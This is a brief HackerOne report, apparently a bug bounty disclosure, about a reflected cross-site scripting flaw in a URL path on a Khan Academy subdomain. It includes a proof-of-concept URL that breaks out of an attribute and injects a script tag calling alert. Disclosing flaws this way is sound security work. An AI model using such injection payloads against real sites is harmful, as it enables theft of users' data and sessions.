Khan Academy: Suffix of url-path is vulnerable to XSS-attack

2014-05-25T10:41:24
ID H1:13285
Type hackerone
Reporter bigbear
Modified 2014-09-16T05:06:44

Description

PoC http://smarthistory.khanacademy.org/Campin"><script>alert(/BigBear/)</script>.html

Malicious users may inject JavaScript, VBScript, ActiveX, HTML or Flash into a vulnerable application to fool a user in order to gather data from them.